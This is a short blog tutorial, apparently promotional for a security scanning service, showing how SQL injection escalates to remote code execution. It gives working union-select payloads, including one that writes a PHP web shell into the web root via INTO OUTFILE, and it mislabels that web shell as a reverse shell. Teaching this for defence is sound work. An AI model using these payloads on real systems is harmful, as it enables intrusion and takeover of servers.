How to preform SQLI TO RCE?
One of the most interesting and important things about any site is the database. So, it’s important to protect it from hacker attacks and in particular from the most common attack against databases – Sql Injection.
Why?
The reason this attack is so common is because in most cases a programmer sends a query to the database to get a particular answer, he also uses some of the query with user input. (Here comes the part of protection and input validation but we will save it for another time …)
Finding sqli in an investigation on a site is cool. But you can agree with me that finding rce is cooler.
And this is where a methodology that not many try to use comes into play – sqli to rce. (Yes it is possible)
How?
One of the options in the sql language is to write to a file, which sounds naive at first… almost like any programming language, but then comes the interesting part, what if we write a shell file to the system ourselves and use it from the outside? Sounds fun – full reverse shell on the system (depending on permissions of course).
Now, lets drill down
The first thing we do is check where the sql is running on the server. This is done by injecting the command @@datadir
into the sql query to get the full path of its location on the server.
example:
Assuming we found a reflection in the second column we will enter the following payload –
'union select 1,@@datadir,3,4 --
And the output will look like this:C:\xampp\mysql\data\
According to the path we can infer that the server uses xampp and if we want to create a file and access it from the server we will need to create it in C:\xampp\htdocs
According to this information, it’s already possible to create the payload for the shell:
'union select 1,<php_payload>,3,4 into outfile <path> --
'union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --
And that’s it, we created a reverse shell within the system. Now left only to access it from outside (web). And this is done from the following link:
<host>/rce.php?cmd=<command>
In my case it’s on the local server then:
127.0.0.1/rce.php?cmd=time
With the following output:
1 The current time is: 16:22:25.20 Enter the new time: 3 4
And now you know How to preform SQLI TO RCE!
Want to check if your website vulnerable to “sqli to rce attack”?
Let Kayran do that for you!